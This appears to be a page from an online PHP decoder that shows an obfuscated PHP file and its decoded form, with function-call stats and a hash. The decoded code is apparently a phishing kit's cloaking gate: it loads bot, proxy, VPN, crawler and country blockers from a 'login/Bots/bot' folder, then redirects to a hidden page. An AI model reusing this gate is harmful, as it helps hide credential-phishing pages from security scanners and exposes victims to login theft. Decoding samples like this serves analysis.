Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(str_rot13(gzinflate(base64_decode('rZLPSsNAEMbveYqlCJuANHdDHsCT5yISZtbJJFWm20k..
Decoded Output download
require_once 'login/Bots/bot/blocker.php';
require_once 'login/Bots/bot/proxy.php';
$tanitatikaram = parse_ini_file("login/Bots/bot/config.ini", true);
$setting_vpn=$tanitatikaram['setting_vpn'];
if($setting_vpn == 'on') {
require_once 'login/Bots/bot/Virtualprivatenetwork.php';
}
$tanitatikaram = parse_ini_file("login/Bots/bot/config.ini", true);
$setting_crawlerdetect=$tanitatikaram['setting_crawlerdetect'];
if($setting_crawlerdetect == 'on') {
require_once 'login/Bots/bot/crawlerdetect.php';
}
require_once 'login/Bots/bot/country.php';
header('Location: servr.php');
Did this file decode correctly?
Original Code
<?php
eval(str_rot13(gzinflate(base64_decode('rZLPSsNAEMbveYqlCJuANHdDHsCT5yISZtbJJFWm20k6ZBXf3YBVmoLBg+fvD9+PGdLnzkgbhKjOJxwNygfktjwgl4eEcVLahlPwVUZr1kD48no23rCAsbBNQvLmaheEWm0MrBksab65ykaEwcbtrG9uHVOnxdzRKrPB2PQB6mXho7/Q/FOV2ZBf2l1dO4/gC/e+vvneiDtJgawXVlDeI01nho//pYgk+6R0VNbIv/IsXNdkC/HPjIvUD9t6BDtg+j5mdlI5KuV+h3FejHDnWqX+6ymK6hM='))));
Function Calls
gzinflate | 1 |
str_rot13 | 1 |
base64_decode | 1 |
Stats
MD5 | 3a8e9c50df789e51ffbca9c297ee5f9f |
Eval Count | 1 |
Decode Time | 50 ms |